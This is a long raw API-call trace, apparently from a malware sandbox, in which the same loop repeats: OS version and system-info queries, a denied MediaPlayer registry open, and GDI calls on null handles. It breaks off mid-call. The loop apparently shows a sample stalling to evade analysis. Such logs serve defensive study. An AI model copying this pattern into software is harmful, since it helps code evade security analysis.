lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.923] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.923] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.923] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.923] BeginPath (hdc=0x0) returned 0 [0090.923] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.923] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.923] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.923] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.923] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.923] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.923] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.923] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.923] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa20401d9 [0090.923] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa00401dc [0090.923] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459c9 [0090.923] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459ca [0090.923] CombineRgn (hrgnDst=0x10459c9, hrgnSrc1=0xa20401d9, hrgnSrc2=0xa00401dc, iMode=1) returned 1 [0090.923] CombineRgn (hrgnDst=0x10459ca, hrgnSrc1=0xa20401d9, hrgnSrc2=0xa00401dc, iMode=4) returned 2 [0090.923] CreateSolidBrush (color=0xff) returned 0x21059c8 [0090.923] CreateSolidBrush (color=0xff0000) returned 0x11059cb [0090.923] DeleteObject (ho=0x11059cb) returned 1 [0090.923] DeleteObject (ho=0xa00401dc) returned 1 [0090.923] DeleteObject (ho=0xa20401d9) returned 1 [0090.923] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.923] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.923] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.923] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.923] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.923] BeginPath (hdc=0x0) returned 0 [0090.923] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.924] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.924] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.924] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.924] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.924] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.924] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.924] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.924] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa10401dc [0090.924] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa30401d9 [0090.924] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459cc [0090.924] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459cd [0090.924] CombineRgn (hrgnDst=0x10459cc, hrgnSrc1=0xa10401dc, hrgnSrc2=0xa30401d9, iMode=1) returned 1 [0090.924] CombineRgn (hrgnDst=0x10459cd, hrgnSrc1=0xa10401dc, hrgnSrc2=0xa30401d9, iMode=4) returned 2 [0090.924] CreateSolidBrush (color=0xff) returned 0x21059cb [0090.924] CreateSolidBrush (color=0xff0000) returned 0x11059ce [0090.924] DeleteObject (ho=0x11059ce) returned 1 [0090.924] DeleteObject (ho=0xa30401d9) returned 1 [0090.924] DeleteObject (ho=0xa10401dc) returned 1 [0090.924] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.924] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.924] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.924] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.924] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.924] BeginPath (hdc=0x0) returned 0 [0090.924] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.924] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.924] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.924] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.924] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.924] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.924] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.924] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.924] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa40401d9 [0090.925] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa20401dc [0090.925] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459cf [0090.925] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459d0 [0090.925] CombineRgn (hrgnDst=0x10459cf, hrgnSrc1=0xa40401d9, hrgnSrc2=0xa20401dc, iMode=1) returned 1 [0090.925] CombineRgn (hrgnDst=0x10459d0, hrgnSrc1=0xa40401d9, hrgnSrc2=0xa20401dc, iMode=4) returned 2 [0090.925] CreateSolidBrush (color=0xff) returned 0x21059ce [0090.925] CreateSolidBrush (color=0xff0000) returned 0x11059d1 [0090.925] DeleteObject (ho=0x11059d1) returned 1 [0090.925] DeleteObject (ho=0xa20401dc) returned 1 [0090.925] DeleteObject (ho=0xa40401d9) returned 1 [0090.925] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.925] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.925] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.925] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.925] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.925] BeginPath (hdc=0x0) returned 0 [0090.925] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.925] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.925] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.925] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.925] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.925] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.925] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.925] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.925] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa30401dc [0090.925] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa50401d9 [0090.925] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459d2 [0090.925] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459d3 [0090.925] CombineRgn (hrgnDst=0x10459d2, hrgnSrc1=0xa30401dc, hrgnSrc2=0xa50401d9, iMode=1) returned 1 [0090.925] CombineRgn (hrgnDst=0x10459d3, hrgnSrc1=0xa30401dc, hrgnSrc2=0xa50401d9, iMode=4) returned 2 [0090.925] CreateSolidBrush (color=0xff) returned 0x21059d1 [0090.925] CreateSolidBrush (color=0xff0000) returned 0x11059d4 [0090.925] DeleteObject (ho=0x11059d4) returned 1 [0090.925] DeleteObject (ho=0xa50401d9) returned 1 [0090.925] DeleteObject (ho=0xa30401dc) returned 1 [0090.925] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.925] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.925] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.926] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.926] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.926] BeginPath (hdc=0x0) returned 0 [0090.926] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.926] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.926] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.926] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.926] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.926] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.926] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.926] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.926] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa60401d9 [0090.926] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa40401dc [0090.926] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459d5 [0090.926] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459d6 [0090.926] CombineRgn (hrgnDst=0x10459d5, hrgnSrc1=0xa60401d9, hrgnSrc2=0xa40401dc, iMode=1) returned 1 [0090.926] CombineRgn (hrgnDst=0x10459d6, hrgnSrc1=0xa60401d9, hrgnSrc2=0xa40401dc, iMode=4) returned 2 [0090.926] CreateSolidBrush (color=0xff) returned 0x21059d4 [0090.926] CreateSolidBrush (color=0xff0000) returned 0x11059d7 [0090.926] DeleteObject (ho=0x11059d7) returned 1 [0090.926] DeleteObject (ho=0xa40401dc) returned 1 [0090.926] DeleteObject (ho=0xa60401d9) returned 1 [0090.926] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.926] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.926] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.926] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.926] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.926] BeginPath (hdc=0x0) returned 0 [0090.926] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.926] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.926] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.926] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.926] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.926] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.926] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.926] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.927] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa50401dc [0090.927] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa70401d9 [0090.927] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459d8 [0090.927] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459d9 [0090.927] CombineRgn (hrgnDst=0x10459d8, hrgnSrc1=0xa50401dc, hrgnSrc2=0xa70401d9, iMode=1) returned 1 [0090.927] CombineRgn (hrgnDst=0x10459d9, hrgnSrc1=0xa50401dc, hrgnSrc2=0xa70401d9, iMode=4) returned 2 [0090.927] CreateSolidBrush (color=0xff) returned 0x21059d7 [0090.927] CreateSolidBrush (color=0xff0000) returned 0x11059da [0090.927] DeleteObject (ho=0x11059da) returned 1 [0090.927] DeleteObject (ho=0xa70401d9) returned 1 [0090.927] DeleteObject (ho=0xa50401dc) returned 1 [0090.927] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.927] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.927] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.927] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.927] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.927] BeginPath (hdc=0x0) returned 0 [0090.927] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.927] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.927] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.927] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.927] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.927] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.927] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.927] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.927] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa80401d9 [0090.927] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa60401dc [0090.927] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459db [0090.927] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459dc [0090.927] CombineRgn (hrgnDst=0x10459db, hrgnSrc1=0xa80401d9, hrgnSrc2=0xa60401dc, iMode=1) returned 1 [0090.927] CombineRgn (hrgnDst=0x10459dc, hrgnSrc1=0xa80401d9, hrgnSrc2=0xa60401dc, iMode=4) returned 2 [0090.927] CreateSolidBrush (color=0xff) returned 0x21059da [0090.927] CreateSolidBrush (color=0xff0000) returned 0x11059dd [0090.927] DeleteObject (ho=0x11059dd) returned 1 [0090.927] DeleteObject (ho=0xa60401dc) returned 1 [0090.927] DeleteObject (ho=0xa80401d9) returned 1 [0090.928] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.928] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.928] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.928] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.928] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.928] BeginPath (hdc=0x0) returned 0 [0090.928] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.928] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.928] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.928] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.928] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.928] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.928] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.928] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.928] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa70401dc [0090.928] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa90401d9 [0090.928] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459de [0090.928] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459df [0090.928] CombineRgn (hrgnDst=0x10459de, hrgnSrc1=0xa70401dc, hrgnSrc2=0xa90401d9, iMode=1) returned 1 [0090.928] CombineRgn (hrgnDst=0x10459df, hrgnSrc1=0xa70401dc, hrgnSrc2=0xa90401d9, iMode=4) returned 2 [0090.928] CreateSolidBrush (color=0xff) returned 0x21059dd [0090.928] CreateSolidBrush (color=0xff0000) returned 0x11059e0 [0090.928] DeleteObject (ho=0x11059e0) returned 1 [0090.928] DeleteObject (ho=0xa90401d9) returned 1 [0090.928] DeleteObject (ho=0xa70401dc) returned 1 [0090.928] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.928] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.928] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.928] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.928] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.928] BeginPath (hdc=0x0) returned 0 [0090.928] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.928] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.928] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.928] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.928] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.928] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.929] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.929] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.929] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xaa0401d9 [0090.929] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa80401dc [0090.929] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459e1 [0090.929] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459e2 [0090.929] CombineRgn (hrgnDst=0x10459e1, hrgnSrc1=0xaa0401d9, hrgnSrc2=0xa80401dc, iMode=1) returned 1 [0090.929] CombineRgn (hrgnDst=0x10459e2, hrgnSrc1=0xaa0401d9, hrgnSrc2=0xa80401dc, iMode=4) returned 2 [0090.929] CreateSolidBrush (color=0xff) returned 0x21059e0 [0090.929] CreateSolidBrush (color=0xff0000) returned 0x11059e3 [0090.929] DeleteObject (ho=0x11059e3) returned 1 [0090.929] DeleteObject (ho=0xa80401dc) returned 1 [0090.929] DeleteObject (ho=0xaa0401d9) returned 1 [0090.929] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.929] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.929] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.929] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.929] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.929] BeginPath (hdc=0x0) returned 0 [0090.929] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.929] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.929] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.929] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: 